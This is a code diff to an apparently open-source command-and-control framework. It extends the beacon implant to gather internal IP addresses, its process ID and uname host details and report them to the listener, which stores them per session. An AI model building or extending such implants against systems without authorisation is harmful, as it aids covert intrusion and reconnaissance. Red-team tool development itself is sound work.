add some metadata

Author: maxDcb

beacon/Beacon.cpp

@@ -59,19 +59,19 @@ std::string getInternalIP()
 	{
         if (ifa->ifa_addr && ifa->ifa_addr->sa_family == AF_INET) 
 		{
+			if(!ips.empty())
+				ips+="\n";
+
             void* tmpAddrPtr = &((struct sockaddr_in*)ifa->ifa_addr)->sin_addr;
             char addressBuffer[INET_ADDRSTRLEN];
             inet_ntop(AF_INET, tmpAddrPtr, addressBuffer, INET_ADDRSTRLEN);
 
             // Filter out loopback
             if (std::string(ifa->ifa_name) != "lo")
 			{
-                std::cout << "Internal IP (" << ifa->ifa_name << "): " << addressBuffer << std::endl;
-				ips += "ifa->ifa_name ";
 				ips += ifa->ifa_name;
-				ips += " ";
+				ips += ": ";
 				ips += addressBuffer;
-				ips += ";";
 			}
         }
     }
@@ -131,11 +131,13 @@ std::string getInternalIP()
 
     for (struct addrinfo* ptr = result; ptr != nullptr; ptr = ptr->ai_next) 
 	{
+		if(!ips.empty())
+			ips+="\n";
+
         struct sockaddr_in* sockaddr_ipv4 = reinterpret_cast<struct sockaddr_in*>(ptr->ai_addr);
         char ipStr[INET_ADDRSTRLEN];
         inet_ntop(AF_INET, &sockaddr_ipv4->sin_addr, ipStr, sizeof(ipStr));
 		ips += ipStr;
-		ips += ";";
     }
 
     freeaddrinfo(result);
@@ -223,11 +225,10 @@ Beacon::Beacon()
 
 	srand(time(NULL));
 
-	std::string ips = getInternalIP();
-	std::cout << "ips " << ips << std::endl;
+	m_ips = getInternalIP();
 
 	int pid = getCurrentPID();
-	std::cout << "pid " << pid << std::endl;
+	m_pid = std::to_string(pid);
 
 #ifdef __linux__
 
@@ -247,12 +248,15 @@ Beacon::Beacon()
 	struct utsname unameData;
 	uname(&unameData);
 
-	// TODO what to do with all that info ?? How to get it ??
-	// std::cout << unameData.sysname << std::endl;
-	// std::cout << unameData.nodename << std::endl;
-	// std::cout << unameData.release << std::endl;
-	// std::cout << unameData.version << std::endl;
-	// std::cout << unameData.machine << std::endl;
+	m_additionalInfo = unameData.sysname;
+	m_additionalInfo += "\n";
+	m_additionalInfo += unameData.nodename;
+	m_additionalInfo += "\n";
+	m_additionalInfo += unameData.release;
+	m_additionalInfo += "\n";
+	m_additionalInfo += unameData.version;
+	m_additionalInfo += "\n";
+	m_additionalInfo += unameData.machine;
 
 	m_arch = unameData.machine;
 
@@ -462,6 +466,9 @@ bool Beacon::taskResultsToCmd(std::string& output)
 	bundleC2Message->set_privilege(m_privilege);
 	bundleC2Message->set_os(m_os);
 	bundleC2Message->set_lastProofOfLife("0");
+	bundleC2Message->set_internalIps(m_ips);
+	bundleC2Message->set_processId(m_pid);
+	bundleC2Message->set_additionalInformation(m_additionalInfo);
 
 	while(!m_taskResult.empty())
 	{
@@ -490,6 +497,9 @@ bool Beacon::taskResultsToCmd(std::string& output)
 			bundleC2Message->set_privilege(ptr->getPrivilege());
 			bundleC2Message->set_os(ptr->getOs());
 			bundleC2Message->set_lastProofOfLife(ptr->getLastProofOfLife());
+			bundleC2Message->set_internalIps(ptr->getInternalIps());
+			bundleC2Message->set_processId(ptr->getProcessId());
+			bundleC2Message->set_additionalInformation(ptr->getAdditionalInformation());
 
 			C2Message c2Message = ptr->getTaskResult();
 			while(!c2Message.instruction().empty())

beacon/Beacon.hpp

@@ -43,6 +43,9 @@ class Beacon
 	std::string m_arch;
 	std::string m_privilege;
 	std::string m_os;
+	std::string m_ips;
+	std::string m_pid;
+	std::string m_additionalInfo;
 
 	std::queue<C2Message> m_tasks;
 	std::queue<C2Message> m_taskResult;

listener/Listener.cpp

@@ -384,8 +384,14 @@ bool Listener::handleMessages(const std::string& input, std::string& output)
 				std::string arch = bundleC2Message->arch();
 				std::string privilege = bundleC2Message->privilege();
 				std::string os = bundleC2Message->os();
+				std::string internalIps = bundleC2Message->internalIps();
+				std::string processId = bundleC2Message->processId();
+				std::string additionalInformation = bundleC2Message->additionalInformation();
 
 				std::shared_ptr<Session> session = make_shared<Session>(listenerhash, beaconHash, hostname, username, arch, privilege, os);
+				session->setInternalIps(internalIps);
+				session->setProcessId(processId);
+				session->setAdditionalInformation(additionalInformation);
 				m_sessions.push_back(std::move(session));
 			}
 			else

listener/Session.hpp

@@ -61,45 +61,94 @@ class Session
 		m_os=os;
 		m_killed=false;
 
+
 		auto current_time = std::chrono::system_clock::now();
 		auto duration_in_seconds = std::chrono::duration<double>(current_time.time_since_epoch());
 		m_lastProofOfLifeSec = duration_in_seconds.count();
 	}
 
-	std::string getListenerHash()
+	const std::string& getListenerHash() const 
 	{
 		return m_listenerHash;
 	}
-
-	std::string getBeaconHash()
+	const std::string& getBeaconHash() const 
 	{
 		return m_beaconHash;
 	}
-
-	std::string getUsername()
+	const std::string& getUsername() const 
 	{
 		return m_username;
 	}
-
-	std::string getHostname()
+	const std::string& getHostname() const 
 	{
 		return m_hostname;
 	}
-
-	std::string getArch()
+	const std::string& getArch() const 
 	{
 		return m_arch;
 	}
-
-	std::string getPrivilege()
+	const std::string& getPrivilege() const 
 	{
 		return m_privilege;
 	}
-
-	std::string getOs()
+	const std::string& getOs() const 
 	{
 		return m_os;
 	}
+	const std::string& getInternalIps() const 
+	{ 
+		return m_internalIps; 
+	}
+	const std::string& getProcessId() const 
+	{ 
+		return m_processId; 
+	}
+	const std::string& getAdditionalInformation() const 
+	{ 
+		return m_additionalInformation; 
+	}
+
+	void setListenerHash(const std::string& listenerHash)
+	{
+		m_listenerHash = listenerHash;
+	}
+	void setBeaconHash(const std::string& beaconHash)
+	{
+		m_beaconHash = beaconHash;
+	}
+	void setUsername(const std::string& username)
+	{
+		m_username = username;
+	}
+	void setHostname(const std::string& hostname)
+	{
+		m_hostname = hostname;
+	}
+	void setArch(const std::string& arch)
+	{
+		m_arch = arch;
+	}
+	void setPrivilege(const std::string& privilege)
+	{
+		m_privilege = privilege;
+	}
+	void setOs(const std::string& os)
+	{
+		m_os = os;
+	}
+	void setInternalIps(const std::string& internalIps)
+	{
+		m_internalIps = internalIps;
+	}
+	void setProcessId(const std::string& processId)
+	{
+		m_processId = processId;
+	}
+	void setAdditionalInformation(const std::string& additionalInformation)
+	{
+		m_additionalInformation = additionalInformation;
+	}
+
 
 	void updatePoofOfLife(std::string& lastProofOfLife)
 	{
@@ -242,6 +291,9 @@ class Session
 	std::string m_arch;
 	std::string m_privilege;
 	std::string m_os;
+	std::string m_internalIps;
+	std::string m_processId;
+	std::string m_additionalInformation;
 
 	std::vector<SessionListener> m_sessionListener;
 

modules/ModuleCmd/C2Message.hpp

@@ -24,7 +24,9 @@ const std::string PrivilegeMsgTag = "PR";
 const std::string OsMsgTag = "OS";
 const std::string LastProofOfLifeMsgTag = "POF";
 const std::string SessionsMsgTag = "SS";
-
+const std::string InternalIpsMsgTag = "IIPS";
+const std::string ProcessIdMsgTag = "PID";
+const std::string AdditionalInfoMsgTag = "ADI";
 
 
 //
@@ -345,6 +347,18 @@ class BundleC2Message
 		if(it != bundleC2MessageJson.end())
 			m_lastProofOfLife = bundleC2MessageJson[LastProofOfLifeMsgTag].get<std::string>();
 
+		it = bundleC2MessageJson.find(InternalIpsMsgTag);
+		if(it != bundleC2MessageJson.end())
+			m_internalIps = bundleC2MessageJson[InternalIpsMsgTag].get<std::string>();
+
+		it = bundleC2MessageJson.find(ProcessIdMsgTag);
+		if(it != bundleC2MessageJson.end())
+			m_processId = bundleC2MessageJson[ProcessIdMsgTag].get<std::string>();
+
+		it = bundleC2MessageJson.find(AdditionalInfoMsgTag);
+		if(it != bundleC2MessageJson.end())
+			m_additionalInformation = bundleC2MessageJson[AdditionalInfoMsgTag].get<std::string>();
+
 		auto sessions = bundleC2MessageJson[SessionsMsgTag];
 
 		for (nlohmann::json::iterator it = sessions.begin(); it != sessions.end(); ++it)
@@ -396,9 +410,16 @@ class BundleC2Message
 			bundleC2MessageJson += nlohmann::json::object_t::value_type(OsMsgTag, m_os);
 		if(!m_lastProofOfLife.empty())
 			bundleC2MessageJson += nlohmann::json::object_t::value_type(LastProofOfLifeMsgTag, m_lastProofOfLife);
+		if (!m_internalIps.empty())
+   			bundleC2MessageJson += nlohmann::json::object_t::value_type(InternalIpsMsgTag, m_internalIps);
+		if (!m_processId.empty())
+			bundleC2MessageJson += nlohmann::json::object_t::value_type(ProcessIdMsgTag, m_processId);
+		if (!m_additionalInformation.empty())
+			bundleC2MessageJson += nlohmann::json::object_t::value_type(AdditionalInfoMsgTag, m_additionalInformation);
 		if(!sessions.empty())
 			bundleC2MessageJson += nlohmann::json::object_t::value_type(SessionsMsgTag, sessions);
 
+
 		*output = bundleC2MessageJson.dump();
 	}
 
@@ -455,18 +476,30 @@ class BundleC2Message
 	{
 		return m_arch;
 	}
-	const std::string&  privilege() const
+	const std::string& privilege() const
 	{
 		return m_privilege;
 	}
-	const std::string&  os() const
+	const std::string& os() const
 	{
 		return m_os;
 	}
-	const std::string&  lastProofOfLife() const
+	const std::string& lastProofOfLife() const
 	{
 		return m_lastProofOfLife;
 	}
+	const std::string& internalIps() const 
+	{ 
+		return m_internalIps; 
+	}
+	const std::string& processId() const 
+	{ 
+		return m_processId; 
+	}
+	const std::string& additionalInformation() const 
+	{ 
+		return m_additionalInformation; 
+	}
 
 	void set_beaconhash(const std::string& beaconHash)
 	{
@@ -500,7 +533,20 @@ class BundleC2Message
 	{
 		m_lastProofOfLife = lastProofOfLife;
 	}
+	void set_internalIps(const std::string& internalIps) 
+	{ 
+		m_internalIps = internalIps; 
+	}
+	void set_processId(const std::string& pid) 
+	{ 
+		m_processId = pid; 
+	}
+	void set_additionalInformation(const std::string& info) 
+	{ 
+		m_additionalInformation = info; 
+	}
 
+	
 private:
 	std::vector<std::unique_ptr<C2Message>> m_c2Messages;
 
@@ -512,6 +558,9 @@ class BundleC2Message
 	std::string m_privilege;
 	std::string m_os;
 	std::string m_lastProofOfLife;
+	std::string m_internalIps;
+	std::string m_processId;
+	std::string m_additionalInformation;
 };
 
 

modules/ModuleCmd/CommonCommand.hpp

@@ -121,7 +121,7 @@ class CommonCommands
 	else if (cmd == ListenerCmd)
 	{
 		output = "listener:\n";
-		output += "  Starts a TCP or SMB listener on the beacon.\n" 
+		output += "  Starts a TCP or SMB listener on the beacon.\n";
 		output += "  The IP or hostname given to the listener is only in case of dropper use, to know where to connect to. It will show in the GUI.\n";
 		output += "  Examples:\n";
 		output += "    - listener start tcp <IP> <port>\n";